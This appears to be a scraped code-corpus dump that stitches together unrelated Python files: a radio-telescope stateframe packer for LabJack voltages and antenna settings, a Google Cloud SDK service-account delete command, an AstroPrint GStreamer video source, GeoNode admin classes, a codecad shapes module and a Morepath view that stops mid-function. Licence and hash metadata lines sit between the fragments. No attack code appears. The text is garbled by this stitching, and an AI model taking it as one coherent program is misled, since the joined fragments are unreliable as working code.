Description:
Writes the Starburst OVRO stateframe items from the stateframe
dictionary. Optionally creates the corresponding XML file. Regardless
of whether the XML file is created, the file name to the XML will be
returned (/tmp/ovro_stateframe.xml).
Even if supplied an empty dictionary, this routine will return
something sensible.
Arguments:
sf_dict: stateframe dictionary.
Returns:
buf: binary data buffer.
fmt: format string.
xmlFile: xml file path.
"""
def gen_starburst_sf(sf_dict, mk_xml=False):
# Set up file name, format string, and buffer.
xmlFile = r'tmp/schedule2_stateframe.xml'
fmt = '<'
buf = ''
xml = None
# Append XML for data cluster
if mk_xml:
xml = open(xmlFile, "w")
xml.write('<Cluster>\n')
xml.write('<Name>Dat2</Name>\n')
xml.write('<NumElts>' + str(Nelements) + '</NumElts>\n')
# ======================================================================
# Start of data dump.
# ======================================================================
append_fmt, append_buf = __general_stateframe(sf_dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ======================================================================
# Start of Starburst cluster dump.
# ======================================================================
append_fmt, append_buf = __starburst_stateframe(sf_dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Append for end of data cluster
if mk_xml:
xml.write('</Cluster>\n')
xml.close()
# Make backup copy of XML file
backup_file = ('starburst/schedule2_stateframe_v' +
str(version) + '_' + version_date + '.xml')
shutil.copyfile(xmlFile, backup_file)
# Print size of buf
print 'schedule2 size =', len(buf)
print 'Modify acc.ini to reflect this if this is a change in size'
return fmt, buf, xmlFile
def __generic_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - Generic LabJacks:
default_serial = 0
default_name = ""
default_volts = 0
default_temp = 0
#----------------------------------------------------------------------
# Name of LabJack (length 49 array of characters)
# ----------------------------------------------------------------------
# Define array dimensions
fmt += 'I'
buf += struct.pack('I', 49)
item = dict.get("NAME", default_name)
# Pack name as string of characters
fmt += '49s'
buf += struct.pack("49s", item)
# Append to XML file
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>Name</Name>\n')
xml.write('<Dimsize>49</Dimsize>\n')
xml.write('<U8>\n')
xml.write('<Name></Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U8>\n')
xml.write('</Array>\n')
#----------------------------------------------------------------------
# Serial Number of LabJack (unsinged int)
# ----------------------------------------------------------------------
# Pack serial number as unsigned int
item = dict.get("SERIAL", default_serial)
fmt += 'I'
buf += struct.pack("I", item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SerialNumber</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# 24 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_24V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.24v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 15 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_15V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.15v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 12 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_12V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.12v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 5 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# -5 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_N5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.Neg5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 5 Volt (switched) input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_S5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.Switched5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of the LabJack in Kelvin (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("LJTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.labjack</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of the Air Around LabJack in Kelvin (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("LJAIRTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.air</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
return fmt, buf
def __lonoise_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - Generic LabJacks:
default_status = 0
default_freq = ("", 0)
#----------------------------------------------------------------------
# Status of Noise Source: 0 = off, 1 = on (unsigned int)
# ----------------------------------------------------------------------
# Pack temperature as unsigned int
item = dict.get("NSSTAT", default_status)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>NoiseSourceStatus</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# LO Frequency: 0 = 3.4GHz, 1 = 7.5GHz,
# 2 = 11.5GHz, 3 = 15.5GHz (unsigned int)
# ----------------------------------------------------------------------
# Pack frequency as unsinged int
item = dict.get("LOFREQ", default_freq)
try:
item = int(item[1])
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>LOFrequency</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
return fmt, buf
def __antenna_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - Generic LabJacks:
default_pow = 0
default_atten = 31.5
default_temp = 0
default_vsel = 0
default_hsel = 0
#----------------------------------------------------------------------
# Power to VQ component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("VQPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to VI component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("VIPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to HQ component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("HQPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to HI component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("HIPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of VQ component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("VQTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of VI component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("VITEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of HQ component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("HQTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of HI component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("HITEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Attenuation setting for VQ component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("VQATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for VI component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("VIATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for HQ component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("HQATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for HI component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("HIATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Source Selection for Vertical Polarization:
# 0 = antenna, 1 = noise source (unsigned int)
# ----------------------------------------------------------------------
# Pack selection as unsigned int
item = dict.get("VNSSEL", default_vsel)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SourceSelection.v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# Source Selection for Horizontal Polarization:
# 0 = antenna, 1 = noise source (unsigned int)
# ----------------------------------------------------------------------
# Pack selection as unsigned int
item = dict.get("HNSSEL", default_hsel)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SourceSelection.h</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
return fmt, buf
# Copied from gen_schedule_sf
def __general_stateframe(sf_dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - General
default_tstamp = 0.0
default_scan_state = 0
default_phase_tracking = 0
default_uvw = np.array([[0.0,0.0,0.0]]*16)
default_delay = np.zeros(16)
default_az = np.zeros(15)
default_el = np.zeros(15)
default_chi = np.zeros(15)
default_track_flag = np.array([False]*16)
# 1 - Schedule_Timestamp (double) [s, in LabVIEW format]
# To be compatible with other timestamps in the stateframe, this
# will be in LabVIEW format, which is s since 1904/01/01 (don't ask).
# It is the time (should be exact second, no microseconds) for
# which the UVW coordinates and Delays are calculated.
item = sf_dict.get('timestamp',default_tstamp)
fmt += 'd'
buf += struct.pack('d',item)
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Timestamp</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
# 2 - Schedule version (double) [N/A]
# Version of the schedule2 stateframe.
item = version
fmt += 'd'
buf += struct.pack('d',item)
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Version</Name>\n')
xml.write('<Val>'+str(item)+'</Val>\n')
xml.write('</DBL>\n')
# 3 - Scan_State (unsigned integer bool)
# Flag (=1 to indicate that DPP should be recording data, =0 otherwise)
item = sf_dict.get('scan_state',default_scan_state)
fmt += 'i'
buf += struct.pack('i',item)
if mk_xml:
xml.write('<I32>\n')
xml.write('<Name>ScanState</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</I32>\n')
# 4 - Phase_Tracking (unsigned integer bool)
# Flag (=1 to indicate that uvw coordinates are valid, =0 otherwise)
item = sf_dict.get('phase_tracking',default_phase_tracking)
fmt += 'I'
buf += struct.pack('I',item)
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>PhaseTracking</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
# 5 - UVW (3 x 16 array of doubles) [ns]
# u, v, w coordinates for each antenna, relative to antenna 1.
# Default is array of zeros (=> not tracking phase center)
item = sf_dict.get('uvw',default_uvw)
# Write dimensions into data stream
fmt += 'II'
buf += struct.pack('II',3,16)
fmt += str(3*16)+'d'
for i in range(16):
buf += struct.pack('3d',item[i,0],item[i,1],item[i,2])
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>UVW</Name>\n')
xml.write('<Dimsize>3</Dimsize><Dimsize>16</Dimsize>\n<DBL>\n<Name></Name>\n<Val></Val>\n</DBL>\n')
xml.write('</Array>\n')
# 6 - Delay (length 16 x 2 array of doubles) [ns]
# Geometric delay (-w coordinate) for each antenna, relative to antenna 1,
# for current time (stateframe timestamp), and again for current time plus
# 1 s (delay1).
# Default is array of zeros (=> not tracking phase center)
# Write dimensions into data stream
fmt += 'II'
buf += struct.pack('II',16,2)
item = sf_dict.get('delay',default_delay)
fmt += '32d'
for i in item:
buf += struct.pack('d',i)
item = sf_dict.get('delay1',default_delay)
for i in item:
buf += struct.pack('d',i)
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>Delay</Name>\n')
xml.write('<Dimsize>16</Dimsize><Dimsize>2</Dimsize>\n<DBL>\n<Name></Name>\n<Val></Val>\n</DBL>\n')
xml.write('</Array>\n')
return fmt, buf
def __starburst_stateframe(sf_dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# Append XML for Starburst cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>Starburst</Name>\n')
xml.write('<NumElts>' + str(Nelements_starburst) + '</NumElts>\n')
# ======================================================================
# Start of LO/Noise Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("LONOISE", {})
# Append XML for LONoiseModule cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>LONM</Name>\n')
xml.write('<NumElts>' + str(Nelements_lonoise) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle LO/Noise source LabJack properties
append_fmt, append_buf = __lonoise_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of LO/Noise Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Start of AntennaA Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("A", {})
# Append XML for LONoiseModule cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>DCMA</Name>\n')
xml.write('<NumElts>' + str(Nelements_antenna) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle Antenna A LabJack properties
append_fmt, append_buf = __antenna_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of AntennaA Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Start of AntennaB Module dump.
# ======================================================================
dict = sf_dict.get("starburst", {}).get("B", {})
# Append XML for LONoiseModule cluster.
if mk_xml:
xml.write('<Cluster>\n')
xml.write('<Name>DCMB</Name>\n')
xml.write('<NumElts>' + str(Nelements_antenna) + '</NumElts>')
# Handle all generic LabJack properties
append_fmt, append_buf = __generic_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Handle Antenna B LabJack properties
append_fmt, append_buf = __antenna_labjack(dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ----------------------------------------------------------------------
# End of AntennaB Module parsing.
if mk_xml:
xml.write('</Cluster>\n')
# ======================================================================
# Include Starburst Version
# ======================================================================
item = starburst_version
fmt += 'I'
buf += struct.pack('I',item)
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>Version</Name>\n')
xml.write('<Val>' + str(item) + '</Val>\n')
xml.write('</U32>\n')
# ======================================================================
# Wrap up end of Starburst cluster.
if mk_xml:
xml.write('</Cluster>')
# ======================================================================
return fmt, buf | mit | -6,084,764,854,640,835,000 | 30.567095 | 106 | 0.436493 | false | 4.081473 | false | false | false |
KaranToor/MA450 | google-cloud-sdk/lib/surface/iam/service_accounts/delete.py | 2 | 2130 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for deleting service accounts."""
import textwrap
from apitools.base.py import exceptions
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.iam import base_classes
from googlecloudsdk.command_lib.iam import iam_util
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base_classes.BaseIamCommand, base.DeleteCommand):
"""Delete a service account from a project."""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': textwrap.dedent("""\
To delete an service account from your project, run:
$ {command} [email protected]
"""),
}
@staticmethod
def Args(parser):
# TODO(user): add tab completion.
parser.add_argument('account',
metavar='IAM-ACCOUNT',
help='The service account to delete.')
def Run(self, args):
try:
console_io.PromptContinue(message='You are about to delete service '
'account [{0}].'.format(args.account),
cancel_on_no=True)
self.iam_client.projects_serviceAccounts.Delete(
self.messages.IamProjectsServiceAccountsDeleteRequest(
name=iam_util.EmailToAccountResourceName(args.account)))
log.status.Print('deleted service account [{0}]'.format(args.account))
except exceptions.HttpError as error:
raise iam_util.ConvertToServiceAccountException(error, args.account)
| apache-2.0 | 7,105,143,336,546,863,000 | 35.724138 | 78 | 0.69108 | false | 4.268537 | false | false | false |
AstroPrint/AstroBox | src/astroprint/camera/v4l2/gstreamer/process/pipelines/bins/v4l2_video_src.py | 1 | 4311 | # coding=utf-8
__author__ = "AstroPrint Product Team <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
import platform
from gi.repository import Gst
from .base_video_src import VideoSrcBinBase
from astroprint.manufacturerpkg import manufacturerPkgManager
#
# Base class for V4L2 Based Video sources
#
class V4L2VideoSrcBin(VideoSrcBinBase):
def __init__(self, pipeline, device, size, rotation):
distName, distVersion, id = platform.linux_distribution()
self._linuxDistVersion = int(distVersion.split('.')[0])
self.__useVideoConvert = self._linuxDistVersion > 9
self.__videoSourceElement = None
self.__videoConvertElement = None
self.__videoLogoElement = None
self.__videoSourceCaps = None
super(V4L2VideoSrcBin, self).__init__(pipeline, device, size, rotation)
# Creates, adds to the bine and links elements for the source Chain. returns the last element of the chain
def _constructSrcChain(self):
self.__videoSourceElement = Gst.ElementFactory.make('v4l2src', 'video_source')
self.__videoSourceElement.set_property("device", self._device)
if self.__useVideoConvert:
self.__videoConvertElement = Gst.ElementFactory.make('videoconvert', 'vconvert')
self.__videoSourceCaps = Gst.ElementFactory.make("capsfilter", "caps_filter")
self.__videoSourceCaps.set_property("caps", Gst.Caps.from_string(self._getVideoSourceCaps()))
#Add Elements to the pipeline
self._bin.add(self.__videoSourceElement)
self._bin.add(self.__videoSourceCaps)
if self.__videoConvertElement:
self._bin.add(self.__videoConvertElement)
self.__videoSourceElement.link(self.__videoSourceCaps)
if self.__videoConvertElement:
self.__videoSourceCaps.link(self.__videoConvertElement)
lastLink = self.__videoConvertElement
else:
lastLink = self.__videoSourceCaps
width, height = self._size
#check if we need to rotate the video
if self._rotation != 0:
if self._rotation in [1,3]:
#dimentions are flipped
height, width = self._size
self.__videoflipElement = Gst.ElementFactory.make('videoflip', 'videoflip')
self.__videoflipElement.set_property("method", self._rotation)
self._bin.add(self.__videoflipElement)
lastLink.link(self.__videoflipElement)
lastLink = self.__videoflipElement
mfWatermark = manufacturerPkgManager().video_watermark
if mfWatermark is False: #There is no watermark
return lastLink
else: # We need to setup a watermark
logoHeight = round(height * self.LOGO_HEIGHT_PERCENT)
logoWidth = round(logoHeight / self.LOGO_ASPECT_RATIO)
# ASTROPRINT'S LOGO FROM DOWN RIGHT CORNER
self.__videoLogoElement = Gst.ElementFactory.make('gdkpixbufoverlay', 'logo_overlay')
if mfWatermark is None: # Use AstroPrint's default
self.__videoLogoElement.set_property('location', '/AstroBox/src/astroprint/static/img/astroprint_logo.png')
else:
self.__videoLogoElement.set_property('location', '/AstroBox/src/astroprint/static/img/variant/%s' % mfWatermark)
self.__videoLogoElement.set_property('overlay-width', logoWidth)
self.__videoLogoElement.set_property('overlay-height', logoHeight)
self.__videoLogoElement.set_property('offset-x', width - ( logoWidth + 10 ) )
self.__videoLogoElement.set_property('offset-y', height - ( logoHeight + 5 ) )
self._bin.add(self.__videoLogoElement)
lastLink.link(self.__videoLogoElement)
return self.__videoLogoElement
#Implement this in the subclasses below
def _getVideoSourceCaps(self):
pass
#
# Base class for USB Based Video sources
#
class UsbVideoSrcBin(V4L2VideoSrcBin):
def _getVideoSourceCaps(self):
if self._linuxDistVersion <= 9:
return 'video/x-raw,format={ I420, YV12, Y41B, Y42B, YVYU, Y444, NV21, NV12, RGB, BGR, RGBx, xRGB, BGRx, xBGR, GRAY8 },width=%d,height=%d,framerate={ 5/1, 10/1, 15/1, 25/1, 30/1 }' % self._size
else:
return 'video/x-raw,width=%d,height=%d,framerate={ 5/1, 10/1, 15/1, 25/1, 30/1 }' % self._size
#
# Base class for Raspicam Based Video sources
#
class RaspicamVideoSrcBin(V4L2VideoSrcBin):
def _getVideoSourceCaps(self):
if self._linuxDistVersion <= 9:
return 'video/x-raw,format=I420,width=%d,height=%d,framerate=30/1' % self._size
else:
return 'video/x-raw,width=%d,height=%d,framerate=30/1' % self._size
| agpl-3.0 | -6,529,463,372,635,997,000 | 34.04878 | 196 | 0.729761 | false | 3.059617 | false | false | false |
simod/geonode | geonode/contrib/worldmap/wm_extra/admin.py | 2 | 1612 | from django.contrib import admin
from .models import ExtLayer, ExtMap, ExtLayerAttribute, LayerStats, MapStats, Endpoint, Action
class ExtLayerAdmin(admin.ModelAdmin):
list_display = (
'layer',
'last_modified',
'gazetteer_project',
'in_gazetteer',
'searchable',
'last_modified',
)
class ExtMapAdmin(admin.ModelAdmin):
list_display = (
'map',
'content_map',
)
class LayerStatsAdmin(admin.ModelAdmin):
list_display = (
'layer',
'visits',
'uniques',
'last_modified',
)
class MapStatsAdmin(admin.ModelAdmin):
list_display = (
'map',
'visits',
'uniques',
'last_modified',
)
class ExtLayerAttributeAdmin(admin.ModelAdmin):
list_display = (
'layer_name',
'searchable',
)
class EndpointAdmin(admin.ModelAdmin):
list_display = ('id', 'description', 'owner', 'url')
list_display_links = ('id',)
search_fields = ['description', 'url']
class ActionAdmin(admin.ModelAdmin):
"""
Admin for Action.
"""
list_display = ('id', 'timestamp', 'action_type', 'description', )
list_filter = ('action_type', )
date_hierarchy = 'timestamp'
ordering = ('-timestamp',)
admin.site.register(ExtLayer, ExtLayerAdmin)
admin.site.register(ExtMap, ExtMapAdmin)
admin.site.register(LayerStats, LayerStatsAdmin)
admin.site.register(MapStats, MapStatsAdmin)
admin.site.register(ExtLayerAttribute, ExtLayerAttributeAdmin)
admin.site.register(Endpoint, EndpointAdmin)
admin.site.register(Action, ActionAdmin)
| gpl-3.0 | -6,687,725,279,111,101,000 | 21.704225 | 95 | 0.637717 | false | 3.647059 | false | false | false |
bluecube/codecad | codecad/shapes/__init__.py | 1 | 2712 | """ User facing constructors for basic shapes.
Names from this module may optionally be imported as "from codecad.shapes import *".
Basic shape interface is composed of functions defined here and of methods on
Shape objects (transformations, shell, extrude ...)"""
import math
from . import simple2d as _s2
from . import simple3d as _s3
from . import polygons2d as _polygons2d
from . import unsafe
from . import gears
from . import airfoils
def rectangle(x=1, y=None):
if y is None:
y = x
return _s2.Rectangle(x, y)
def circle(d=1, r=None):
return _s2.Circle(d, r)
def half_plane():
return _s2.HalfPlane()
def regular_polygon2d(n, d=1, r=None, side_length=None, across_flats=None):
return _s2.RegularPolygon2D(n, d, r, side_length, across_flats)
def polygon2d(points):
return _polygons2d.Polygon2D(points)
def polygon2d_builder(origin_x, origin_y):
return _polygons2d.Polygon2D.build(origin_x, origin_y)
def capsule(x1, y1, x2, y2, width):
""" Use zero thickness rectangle trick to model a 2D capsule between two points """
dx = x2 - x1
dy = y2 - y1
length = math.hypot(dx, dy)
angle = math.atan2(dy, dx)
return (
rectangle(length, 0)
.offset(width / 2)
.rotated(math.degrees(angle))
.translated((x1 + x2) / 2, (y1 + y2) / 2)
)
def box(x=1, y=None, z=None):
if (y is None) != (z is None):
raise ValueError("y and z must either both be None, or both be number")
if y is None:
y = x
z = x
return rectangle(x, y).extruded(z)
def sphere(d=1, r=None):
if r is not None:
d = 2 * r
return _s3.Sphere(d)
def cylinder(h=1, d=1, r=None, symmetrical=True):
return circle(d=d, r=r).extruded(h, symmetrical)
def half_space():
return _s3.HalfSpace()
def _group_op_helper(shapes, name, op2, op3, r):
""" Check that shapes is not empty and that dimensions match """
shapes = list(shapes)
if len(shapes) == 0:
raise ValueError(
name + " of empty set objects doesn't make much sense, does it?"
)
elif len(shapes) == 1:
return shapes[0]
else:
dim = shapes[0].dimension()
if any(shape.dimension() != dim for shape in shapes):
raise ValueError(name + " needs shapes of identical dimensions")
if dim == 2:
return op2(shapes, r=r)
else:
return op3(shapes, r=r)
def union(shapes, r=-1):
return _group_op_helper(shapes, "Union", _s2.Union2D, _s3.Union, r)
def intersection(shapes, r=-1):
return _group_op_helper(
shapes, "Intersection", _s2.Intersection2D, _s3.Intersection, r
)
# pylama:ignore=W0611
| gpl-3.0 | 7,885,684,380,373,062,000 | 23.214286 | 87 | 0.623156 | false | 3.106529 | false | false | false |
praxigento/damvitool | damvitool/view.py | 1 | 3902 | from json import dumps
from damvitool.utils import to_json_type
from morepath import redirect, Response, NO_IDENTITY, Identity
from damvitool.main import DamvitoolApp
from damvitool.model import Root, Database, Table, Record, UniGridRequest
from webob.exc import HTTPException
__author__ = 'alex-smirnov'
@DamvitoolApp.json(model=Root)
def root_default(self, request):
return self.get_schema(request)
@DamvitoolApp.json(model=Database, permission=Identity)
def database(self, request):
return self.get_schema(request)
@DamvitoolApp.json(model=Database, name='mode', permission=Identity)
def database_mode(self, request):
"""Get database MODE data
"""
return self.get_mode()
@DamvitoolApp.json(model=Table, permission=Identity)
def tables(self, request):
return {
'data': [request.view(Record.from_object(r)) for r in self.select()],
'add': request.link(self, 'add')
}
@DamvitoolApp.json(model=Table, name='add', request_method='POST', permission=Identity)
def tables_add(self, request):
"""Add record to table with values form request body
"""
r = self.add(request.json)
return request.view(Record.from_object(r))
@DamvitoolApp.json(model=Record, permission=Identity)
def record(self, request):
"""Get json object with record data
"""
obj = self.get()
result_dict = {}
